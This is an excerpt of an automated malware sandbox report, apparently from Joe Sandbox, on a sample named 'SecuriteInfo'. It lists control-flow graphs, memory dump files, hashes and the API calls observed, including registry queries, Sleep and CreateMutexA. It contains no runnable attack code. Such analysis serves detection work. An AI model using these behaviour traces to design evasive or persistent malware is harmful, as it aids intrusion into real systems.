                                                                                                                                                                                                                                        control_flow_graph 382 b85d40-b85e0c call b85a70 call b85b10 call b84ad0 390 b85e0e-b85e1a 382->390 391 b85e36-b85e3c 382->391 392 b85e2c-b85e33 call b9ecf8 390->392 393 b85e1c-b85e2a 390->393 394 b85e3e-b85e4a 391->394 395 b85e66-b85e81 call b9e681 391->395 392->391 393->392 396 b85e82 call bb82fa 393->396 398 b85e5c-b85e63 call b9ecf8 394->398 399 b85e4c-b85e5a 394->399 402 b85e87-b85f15 call bb82fa call bb5780 RegOpenKeyExA 396->402 398->395 399->398 399->402 412 b85f41-b85f64 RegCloseKey 402->412 413 b85f17-b85f40 RegQueryValueExA 402->413 414 b85f67-b85f6c 412->414 413->412 414->414 415 b85f6e-b85f85 call b99750 414->415 418 b85faf-b85fc7 415->418 419 b85f87-b85f93 415->419 420 b85fc9-b85fd5 418->420 421 b85ff1-b8600c call b9e681 418->421 422 b85fa5-b85fac call b9ecf8 419->422 423 b85f95-b85fa3 419->423 424 b85fe7-b85fee call b9ecf8 420->424 425 b85fd7-b85fe5 420->425 422->418 423->422 427 b8600d-b8605b call bb82fa 423->427 424->421 425->424 425->427 436 b8605d-b86086 427->436 437 b86087-b86096 427->437 436->437 440 b86098-b860a4 437->440 441 b860c4-b860dc 437->441 442 b860ba-b860c1 call b9ecf8 440->442 443 b860a6-b860b4 440->443 444 b860de-b860ea 441->444 445 b86106-b8611e 441->445 442->441 443->442 448 b86156-b86238 call bb82fa call b99090 call b85d40 443->448 450 b860fc-b86103 call b9ecf8 444->450 451 b860ec-b860fa 444->451 446 b86148-b86155 call b9e681 445->446 447 b86120-b8612c 445->447 452 b8613e-b86145 call b9ecf8 447->452 453 b8612e-b8613c 447->453 470 b8623a 448->470 471 b8623c-b8625b call b821c0 448->471 450->445 451->448 451->450 452->446 453->448 453->452 470->471 474 b8628c-b86292 471->474 475 b8625d-b8626c 471->475 478 b86295-b8629a 474->478 476 b8626e-b8627c 475->476 477 b86282-b86289 call b9ecf8 475->477 476->477 480 b864b7 call bb82fa 476->480 477->474 478->478 479 b8629c-b862c4 call b99090 call b85d40 478->479 491 b862c8-b862e9 call b821c0 479->491 492 b862c6 479->492 486 b864bc call bb82fa 480->486 490 b864c1-b86542 call bb82fa 486->490 497 b86548 490->497 498 b8682a-b8683e 490->498 501 b8631a-b8632e 491->501 502 b862eb-b862fa 491->502 492->491 503 b86550-b86564 497->503 499 b868e3 call b99890 498->499 500 b86844-b86869 call b99750 498->500 511 b868e8-b86a19 call bb82fa call b9a170 call b99750 499->511 516 b8686b-b86877 500->516 517 b86893-b86899 500->517 514 b863d8-b863fc 501->514 515 b86334-b8633a 501->515 506 b862fc-b8630a 502->506 507 b86310-b86317 call b9ecf8 502->507 503->499 508 b8656a-b865b4 call b99750 call b9ab00 503->508 506->486 506->507 507->501 536 b866e9-b86703 508->536 537 b865ba-b865d7 call b9ab00 508->537 601 b86a4b-b86a5d 511->601 602 b86a1b-b86a21 511->602 522 b86400-b86405 514->522 521 b86340-b8636d call b99090 call b85d40 515->521 523 b86889-b86890 call b9ecf8 516->523 524 b86879-b86887 516->524 526 b8689b-b868a7 517->526 527 b868c3-b868e2 call b9e681 517->527 570 b8636f 521->570 571 b86371-b86398 call b821c0 521->571 522->522 533 b86407-b8646c call b99750 * 2 522->533 523->517 524->511 524->523 529 b868b9-b868c0 call b9ecf8 526->529 530 b868a9-b868b7 526->530 529->527 530->511 530->529 564 b86499-b864b6 call b9e681 533->564 565 b8646e-b8647d 533->565 536->499 549 b86709-b86765 call b99750 call b9a910 536->549 537->536 556 b865dd-b865fa call b9ab00 537->556 574 b8679c-b867af 549->574 575 b86767-b86773 549->575 556->536 578 b86600-b8661d call b9ab00 556->578 572 b8648f-b86496 call b9ecf8 565->572 573 b8647f-b8648d 565->573 570->571 594 b863c9-b863cc 571->594 595 b8639a-b863a9 571->595 572->564 573->490 573->572 584 b867dd-b867e4 574->584 585 b867b1-b867bd 574->585 581 b86789-b86797 call b9ecf8 575->581 582 b86775-b86783 575->582 578->536 603 b86623-b86640 call b9ab00 578->603 581->574 582->511 582->581 596 b8680f-b8681b 584->596 597 b867e6-b867ef 584->597 591 b867bf-b867cd 585->591 592 b867d3-b867da call b9ecf8 585->592 591->511 591->592 592->584 594->521 598 b863d2 594->598 605 b863ab-b863b9 595->605 606 b863bf-b863c6 call b9ecf8 595->606 596->503 599 b86821-b86827 596->599 607 b867f1-b867ff 597->607 608 b86805-b8680c call b9ecf8 597->608 598->514 599->498 602->601 611 b86a23-b86a2f 602->611 603->536 621 b86646-b86663 call b9ab00 603->621 605->480 605->606 606->594 607->511 607->608 608->596 616 b86a41-b86a48 call b9ecf8 611->616 617 b86a31-b86a3f 611->617 616->601 617->616 619 b86a5e-b86a63 call bb82fa 617->619 621->536 627 b86669-b86686 call b9ab00 621->627 627->536 630 b86688-b866a5 call b9ab00 627->630 630->536 633 b866a7-b866c4 call b9ab00 630->633 633->536 636 b866c6-b866e3 call b9ab00 633->636 636->536 636->584
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 02f52c6b94ca54df50f3fca10c7e7639ec9db5f746eddf3eeb55125b2dc213df
                                                                                                                                                                                                                                        • Instruction ID: bdec2ced2e332d5f86b6efe0d87fc1a068d07c9a53c8202eda64dcddb94e481c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02f52c6b94ca54df50f3fca10c7e7639ec9db5f746eddf3eeb55125b2dc213df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9B1F5B190020CABEF24DF54CD84BEEBBF9EF44304F5045A9F915A7282DB749A84CB95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 639 b89675-b89861 call b99090 call b85d40 call b88600 call b998b0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 7249dc24f626bdfc89015d4a5d9bd3b3276ee9d1e2dc5ced5ecaf7a6e160918d
                                                                                                                                                                                                                                        • Instruction ID: fbeace02bd0f81d6af72d38ac3fcf34d283dc1b38b1b362a7f0d07237cb0dea3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7249dc24f626bdfc89015d4a5d9bd3b3276ee9d1e2dc5ced5ecaf7a6e160918d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF3137717102049BEF18FB78CD8977DBBA6EB85310F244298E424AB3E2D7759980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 661 b89a14-b89a34 665 b89a62-b89a7e 661->665 666 b89a36-b89a42 661->666 669 b89aac-b89acb 665->669 670 b89a80-b89a8c 665->670 667 b89a58-b89a5f call b9ecf8 666->667 668 b89a44-b89a52 666->668 667->665 668->667 673 b8a3fb 668->673 671 b89af9-b8a3e6 call b99750 669->671 672 b89acd-b89ad9 669->672 675 b89a8e-b89a9c 670->675 676 b89aa2-b89aa9 call b9ecf8 670->676 677 b89adb-b89ae9 672->677 678 b89aef-b89af6 call b9ecf8 672->678 680 b8a423-b8a466 Sleep CreateMutexA 673->680 681 b8a3fb call bb82fa 673->681 675->673 675->676 676->669 677->673 677->678 678->671 681->680
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 67972c9a134bc41c3fd5a41674d989fbf3962ff759d7473d061ee5678ff01d2a
                                                                                                                                                                                                                                        • Instruction ID: b2a18ab329e4cfbaf913152f70fa5a4f6b7907d865ef9bc58e0ff5744b55fcc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67972c9a134bc41c3fd5a41674d989fbf3962ff759d7473d061ee5678ff01d2a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D3144717141449BFF1CEB68CD887BCBBE2EB85310F248698E464AB3E1DB759980CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B89B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
